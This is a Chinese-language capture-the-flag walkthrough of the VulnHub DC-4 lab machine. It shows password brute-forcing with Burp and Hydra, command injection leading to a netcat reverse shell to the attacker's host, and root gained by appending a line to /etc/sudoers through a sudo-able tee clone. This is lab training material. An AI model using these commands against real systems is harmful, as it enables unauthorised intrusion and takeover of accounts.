VulnHub DC: 4

下載地址
https://download.vulnhub.com/dc/DC-4.zip
從nmap 入手（靶機在192.168.1.106）

nmap -sT -sV -sC 192.168.1.106 -O -p-

開放了80，22埠。
先上個80看看

只有一個登陸介面，嘗試在username輸入’or’1’='1 看看有沒有sql注入。重定向回本頁面。接著用hackbar試了一下，看起來沒有sql注入。那就爆破密碼

爆破錶單

這裡可以用hydra 和burpsuit ,我在這裡用的是burpsuit pro。
配置好代理後。

sent to intruder
清除∮後，選password,username為admin

字典的話
https://github.com/danielmiessler/SecLists
這個專案上有字典檔案，選了password/darkweb2017-top10000，執行緒選50.
幸運的是沒跑完字典，密碼就出來了

burpsuit 怎麼確定是否成功，看狀態碼，長度。按長度排序了一下，點了一下happy的回應包

登上去看看

發現有命令執行漏洞，讓他走burpsuit看看


改成whoami

NC反彈shell

用nc 在本地偵聽一個shell吧

nc -nlvp 4444

但在這裡需要構造同樣的格式
nc+ -nv+192.168.1.127+ 4444 + -e+/bin/bash

之後用python升級一下這個shell

python -c 'import pty; pty.spawn("/bin/bash")'

看了一下該目錄下的login.php怪不得沒有sql注入。

find / -perm -u=s 2>/dev/null

發現了su,sudo。但不知道www的密碼。但這裡還有個jim使用者。cat test.sh 看了一下，沒什麼東西

但是在/home/jim，目錄下發現了一個過去密碼的備份檔案，cat一下

這個時候可以考慮通過jim賬號爆破ssh登陸。這個時候可以用hydra去爆破ssh。
複製到kali,新建一個dc4.txt

hydra -l jim -P dc4.txt ssh://192.168.1.106

登陸後，發現了一個mbox,cat 一下似乎是一個郵箱傳送記錄。
去/var/mail,看看有沒有什麼記錄。
結果在/var/mail/jim下，發現了charles賬號的密碼

切換使用者看看

我不知道這個teehee是什麼，但似乎輸入什麼他就返回什麼給你


我在https://gtfobins.github.io/ 找到了一個類似的命令tee

這個命令在sudo幫助可以利用管道命令給檔案寫入某些資料。這樣的話

echo "charles  ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers

在sudoers中加入Charles

之後用
sudo su root
輸入密碼
得到root許可權。就去/home/root下得到最後的flag